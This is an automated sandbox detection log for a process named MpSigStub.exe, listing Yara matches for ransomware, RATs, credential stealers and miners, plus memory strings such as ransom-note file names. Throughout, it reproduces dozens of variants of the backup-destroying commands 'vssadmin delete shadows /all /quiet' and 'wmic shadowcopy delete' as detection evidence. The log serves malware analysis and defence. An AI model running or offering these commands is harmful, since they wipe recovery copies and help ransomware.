Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Marvel Ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Cute Ransomware
Source: Yara match File source: 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Xorist ransomware
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Found potential ransomware demand text
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: )Decrypting of your files is only possible
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: Decrypting of your files is only possible
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: )Decrypting of your files is only possible]
Found string related to ransomware
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp Binary or memory string: &act=gettext&lang=
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp Binary or memory string: &encrypted=
May drop file containing decryption instructions (likely related to ransomware)
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp Binary or memory string: HELP_instructions.html
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp Binary or memory string: HOW TO DECRYPT FILES.txt
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp Binary or memory string: How to decrypt files.html
Deletes shadow drive data (may be related to ransomware)
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp Binary or memory string: vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp Binary or memory string: %vssadmin.exedeleteshadows/all/quiet
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp Binary or memory string: 'vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp Binary or memory string: vssadmindeleteshadows/all/quiet
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp Binary or memory string: !vssadmindeleteshadows/all/quiet
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp Binary or memory string: Nvssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: Nvssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: Fvssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: #vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: /c vssadmin delete shadows /all /quiet]
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp Binary or memory string: vssadmindeleteshadows
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp Binary or memory string: vssadmin Delete Shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp Binary or memory string: cmd /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp Binary or memory string: 6vssadmin.exe delete shadows
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe delete shadows /all /Quiet
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all /for=
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp Binary or memory string: cmd.exe /c vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe delete shadows /quiet /all
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe vssadmin delete shadows / all / quiet
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: */C vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp Binary or memory string: /C vssadmin delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /for=c: /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /for=d: /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp Binary or memory string: vssadmin.exe delete shadows /all /quiet;wmic shadowcopy delete
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /all /quiet & wmic shadowcopy delete
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows /All]
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: /C vssadmin Delete Shadows /Quiet /All
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp Binary or memory string: vssadmin delete shadows
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: /C vssadmin.exe delete shadows /all /quiet
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: /C vssadmin.exe delete shadows /all /quietx
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp Binary or memory string: T/c vssadmin.exe Delete Shadows /All /Quiet
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: /c vssadmin.exe delete shadows /all /quiet]

System Summary:

Malicious sample detected (through community Yara rule)
Source: 36.3.MpSigStub.exe.197a36f3b2a.205.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a36f3b2a.148.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a3279566.201.raw.unpack, type: UNPACKEDPE Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 36.3.MpSigStub.exe.197a364b8a5.203.raw.unpack, type: UNPACKEDPE Matched rule: Detects Tofu Trojan Author: Cylance
Source: 36.3.MpSigStub.exe.197a36f3b2a.205.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a4fa798e.184.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 36.3.MpSigStub.exe.197a364b8a5.181.raw.unpack, type: UNPACKEDPE Matched rule: Detects Tofu Trojan Author: Cylance
Source: 36.3.MpSigStub.exe.197a4f46966.113.raw.unpack, type: UNPACKEDPE Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 36.3.MpSigStub.exe.197a3929e2b.149.unpack, type: UNPACKEDPE Matched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 36.3.MpSigStub.exe.197a39e033e.65.unpack, type: UNPACKEDPE Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 36.3.MpSigStub.exe.197a47aa096.53.raw.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 36.3.MpSigStub.exe.197a47aa096.213.raw.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 36.3.MpSigStub.exe.197a37e87d6.70.raw.unpack, type: UNPACKEDPE Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a32ef4fa.18.raw.unpack, type: UNPACKEDPE Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a364dcf9.202.raw.unpack, type: UNPACKEDPE Matched rule: Detects Tofu Trojan Author: Cylance
Source: 36.3.MpSigStub.exe.197a4fa8d92.185.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 36.3.MpSigStub.exe.197a32a3acd.179.raw.unpack, type: UNPACKEDPE Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a364dcf9.182.raw.unpack, type: UNPACKEDPE Matched rule: Detects Tofu Trojan Author: Cylance
Source: 36.3.MpSigStub.exe.197a44b5166.45.raw.unpack, type: UNPACKEDPE Matched rule: Detects Derusbi Kernel Driver Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE Matched rule: Detects Pupy RAT Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a32ee0f6.17.raw.unpack, type: UNPACKEDPE Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a3929e2b.210.unpack, type: UNPACKEDPE Matched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 36.3.MpSigStub.exe.197a4c04b1a.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a36f3b2a.193.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a36f3b2a.193.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a36f3b2a.215.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a32a53a1.178.raw.unpack, type: UNPACKEDPE Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a32eccf2.19.raw.unpack, type: UNPACKEDPE Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a36f3b2a.148.raw.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4fa658a.183.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 36.3.MpSigStub.exe.197a4fa8d92.116.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 36.3.MpSigStub.exe.197a47aa096.59.raw.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: Detects export from Gold Dragon - February 2018 Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: Detects Running RAT malware from Gold Dragon report Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: Rescator PDB strings within binaries Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a4c03116.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a46f017a.58.raw.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4f45162.112.raw.unpack, type: UNPACKEDPE Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 36.3.MpSigStub.exe.197a33b6aa2.66.raw.unpack, type: UNPACKEDPE Matched rule: Detects malware from DrqgonFly APT report Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a36f3b2a.215.unpack, type: UNPACKEDPE Matched rule: dump_tool Author: @patrickrolsen
Source: 36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack, type: UNPACKEDPE Matched rule: Detects OilRig malware Author: Eyal Sela
Source: 36.3.MpSigStub.exe.197a32a2a79.180.raw.unpack, type: UNPACKEDPE Matched rule: Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan) Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 36.3.MpSigStub.exe.197a37e91da.72.raw.unpack, type: UNPACKEDPE Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: Detects credential stealer byed on many strings that indicate password store access Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 36.3.MpSigStub.exe.197a4fa658a.115.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 36.3.MpSigStub.exe.197a46f017a.26.raw.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE Matched rule: Detects DNSpionage Karkoff malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a434950c.82.unpack, type: UNPACKEDPE Matched rule: Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a4fa798e.114.raw.unpack, type: UNPACKEDPE Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 36.3.MpSigStub.exe.197a37e9bde.71.raw.unpack, type: UNPACKEDPE Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a3e184e5.98.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a3d9206c.229.raw.unpack, type: UNPACKEDPE Matched rule: Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a357b147.154.unpack, type: UNPACKEDPE Matched rule: Detects Tofu Trojan Author: Cylance
Source: 36.3.MpSigStub.exe.197a357b147.154.unpack, type: UNPACKEDPE Matched rule: This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell Author: FireEye
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE Matched rule: LogKext is an open source keylogger for Mac OS X, a product of FSB software. Author: @mimeframe
Source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE Matched rule: Detects Mimikatz strings Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack, type: UNPACKEDPE Matched rule: Detects Tofu Trojan Author: Cylance
Source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack, type: UNPACKEDPE Matched rule: This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell Author: FireEye
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: Detects Mini RAT malware Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: XOR loops from Sakula malware Author: David Cannings
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 Author: FireEye
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project. Author: FireEye
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Tofu Trojan Author: Cylance
Source: 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, type: MEMORY Matched rule: 9002 Identifying Strings Author: Seth Hardy
Source: 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY Matched rule: Red Leaves C&C left in memory, use with Volatility / Rekall Author: David Cannings
Source: 00000024.00000003.6341599132.00000197A3621000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Tofu Trojan Author: Cylance
Source: 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Xtrem RAT v3.5 Author: Jean-Philippe Teissier / @Jipe_
Source: 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000024.00000003.6355645936.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 00000024.00000003.6290353787.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Ham_backdoor Author: Cylance Spear Team
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mirage Identifying Strings Author: Seth Hardy
